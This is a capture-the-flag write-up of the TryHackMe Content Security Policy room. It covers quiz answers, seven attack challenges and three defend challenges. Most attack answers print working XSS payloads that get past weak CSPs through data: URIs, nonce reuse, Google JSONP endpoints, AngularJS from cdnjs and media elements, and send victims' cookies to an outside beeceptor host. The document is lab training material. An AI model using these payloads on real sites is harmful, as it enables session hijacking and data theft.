Content Security Policy

THM Room https://tryhackme.com/room/csp

    • What does CSP stand for?

    Answer : Content Security Policy

    • CSP is designed to add an additional layer of protection against the exploitation of what vulnerability?

    Answer : XSS

    • In  which part of the HTTP response does the server usually send the policy to the client?

    Answer : header

    • Which directive can we use to restrict the loading of scripts on our website?

    Answer : script-src

    • Which directive can we use to restrict the loading of videos on our website?

    Answer : media-src

    • If we want to log CSP violations, which directive do we need to set to have the browser report violations to us?

    Answer : report-uri

    • If we want to allow script execution via functions such as eval() from already trusted scripts, what source should we allow in our script-src directive?

    Answer : 'unsafe-eval'

    • What directive-source combination should we add to our policy if we want to specifically block all JavaScript content from running on our website?

    Answer : script-src 'none'

    • What hashing algorithm can you use to verify the scripts being loaded? (Without the numbers) 

    Answer : SHA

    • Can you include the URLs of the permitted scripts directly in your security policy? (Yes / No)

    Answer : Yes

    • If Ajax/XHR requests are blocked, can we still exfiltrate sensitive information? (Yes / No)

    Answer : Yes

    • I have deployed the CSP Sandbox machine.

    No Answer.

    • Flag for attack-1

    First, set up a http request receptor : https://beeceptor.com/console/csptest URL to exfiltrate de data.

    Then use https://csp-evaluator.withgoogle.com/ to get the CSP's with the IP

    The CSP from CSP evaluator : 

    default-src * 
    'unsafe-inline';

    I tried 

    <script>alert(1)</script> and it works.

    Then, 

    <BODY ONLOAD=fetch(`https://csptest.free.beeceptor.com/${document.cookie}`)>

    But it was not working. I changed my script tag by loading a crafted image calling the exfiltration URL adding the cookies :

    <script>new Image().src="https://csptest.free.beeceptor.com?c="+document.cookie;</script>

    On beeceptor : 

    GET /?c=flag=THM{Th4t_W4s_Pr3tty_3asy}

    Answer : THM{Th4t_W4s_Pr3tty_3asy}

    • Flag for attack-2

    For the second question, the CSP was : 

    default-src *;
    style-src 'self';
    script-src data:

    I tried a default xss working attack : 

    <script src="data:application/javascript,alert(1)"></script>

    Then encoded in base64 the fetch call : 

    fetch('https://csptest.free.beeceptor.com/${document.cookie}')
    
                  
    ZmV0Y2goJ2h0dHBzOi8vY3NwdGVzdC5mcmVlLmJlZWNlcHRvci5jb20vJHtkb2N1bWVudC5jb29raWV9Jyk=
    
                  
    <script src="data:;base64,ZmV0Y2goImh0dHBzOi8vY3NwdGVzdC5mcmVlLmJlZWNlcHRvci5jb20vJHtkb2N1bWVudC5jb29raWV9Iik="></script>
    
                  
    This give me the flag : 
                  
    /flag=THM%7BUs1ng_data:_1snt_Any_S4fer%7D

    Answer : THM{Us1ng_data:_1snt_Any_S4fer}

    • Flag for attack-3

    I got the CSP : 

    default-src 'none';
    img-src *;
    style-src 'self';
    script-src 'unsafe-inline'

    I tried :

    "/><script>alert(1337);</script>

    This one works, i could then crafted the following XSS : 

    <script>new Image().src="https://csptest.free.beeceptor.com?c="+document.cookie;</script>
    
                  
    /?c=flag=THM{Th4ts_N0t_4n_1m4ge!!}

    Answer : THM{Th4ts_N0t_4n_1m4ge!!}

    • Flag for attack-4

    CSP : 

    default-src 'none';
    style-src * 'self';
    script-src 'nonce-abcdef'
    "/><script nonce="abcdef">alert(1337);</script>
    Works beacuse nonce-abcdef allows for scripts

    THen with the extraction of cookies :

    <link id="test" rel=stylesheet href="" /><script nonce="abcdef">document.getElementById('test').href="https://csptest.free.beeceptor.com/" + document.cookie;</script>

    /flag=THM%7BStyle_Y0ur_W3bs1teS%7D 

    Answer : THM{Style_Y0ur_W3bs1teS}

    • Flag for attack-5

    CSP : 

    default-src 'none';
    style-src 'self';
    img-src *;
    script-src 'unsafe-eval' *.google.com

    I checked the explanations :

    script-src    
    Host whitelists can frequently be bypassed. Consider using 'strict-dynamic' in combination with CSP nonces or hashes.

    'unsafe-eval'
    'unsafe-eval' allows the execution of code injected into DOM APIs such as eval().

    error *.google.com
    www.google.com is known to host JSONP endpoints which allow to bypass this CSP.

    From this, i google JSONP and found a JSONP.txt interesting file on github :

    https://github.com/zigoo0/JSONBee in jsonp.txt

    With those example, i crafted my script tag XSS : 

    <script src="//accounts.google.com/o/oauth2/revoke?callback=eval(document.location='https://csptest.free.beeceptor.com/'.concat(document.cookie))"></script> 
    
                  
    /flag=THM%7BN0_JSONP_D0mains_Plz%7D

    Answer : THM{N0_JSONP_D0mains_Plz}

    • Flag for attack-6

    CSP : 

    default-src 'none';
    img-src *;
    style-src 'self';
    script-src 'unsafe-eval' cdnjs.cloudflare.com

    Searching for cdn cloudflare csp bypass :  https://book.hacktricks.xyz/pentesting-web/content-security-policy-csp-bypass

    <script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
     
    <script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" /></script>
     <div ng-app ng-csp>
      {{ x = $on.curry.call().eval("fetch('http://localhost/index.php').then(d => {})") }}
     </div>
     
    "><script src="https://cdnjs.cloudflare.com/angular.min.js"></script> <div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>

    "><script src="https://cdnjs.cloudflare.com/angularjs/1.1.3/angular.min.js"> </script>
    <div ng-app ng-csp id=p ng-click=$event.view.alert(1337)>

    I tried console.log(1) call :

    <script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
    <div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };console.log(1);//');}} </div>

    It works, i follow then with the cookie exfiltration ;

    <script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
    <div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };document.location="https://csptest.free.beeceptor.com/".concat(document.cookie);//');}} </div>
     /flag=THM%7BTrust_N0_CDN%7D

    Answer : THM{Trust_N0_CDN}

    • Flag for attack-7

    CSP :

    default-src 'none';
    media-src *;
    style-src 'self';
    script-src 'self'

    XSS  script :

    <script src="/'; new Audio('https://csptest.free.beeceptor.com/' + document.cookie); '"></script>
    /flag=THM%7BTh1s_4udio_S0unds_N1ce%7D

    Answer : THM{Th1s_4udio_S0unds_N1ce}

    TASK 8 : CSP Sandbox :: Defend challenges 

    • What is the flag for defend-1?

    CSP : 

    script-src 'self'

    You have successfully defended the server against attackers!
    Here's your reward: THM{N0_0utside_S0urces}

    Answer : THM{N0_0utside_S0urces}

    • What is the flag for defend-2?

    CSP : 

    script-src 'nonce-ae3b00'

    You have successfully defended the server against attackers!
    Here's your reward: THM{M4k3_Sure_Y0ur_N0nce_1s_R4ndom}

    Answer : THM{M4k3_Sure_Y0ur_N0nce_1s_R4ndom}

    • What is the flag for defend-3?

    Using https://report-uri.com/home/hash for the hash of the script : console.log("__defend-3_REAL=true")

    CSP : 

    script-src 'sha256-8gQ3l0jVGr5ZXaOeym+1jciekP8wsfNgpZImdHthDRo='

    You have successfully defended the server against attackers!
    Here's your reward: THM{Hash_Y0ur_1nl1ne_Scr1pts}

    Answer : THM{Hash_Y0ur_1nl1ne_Scr1pts}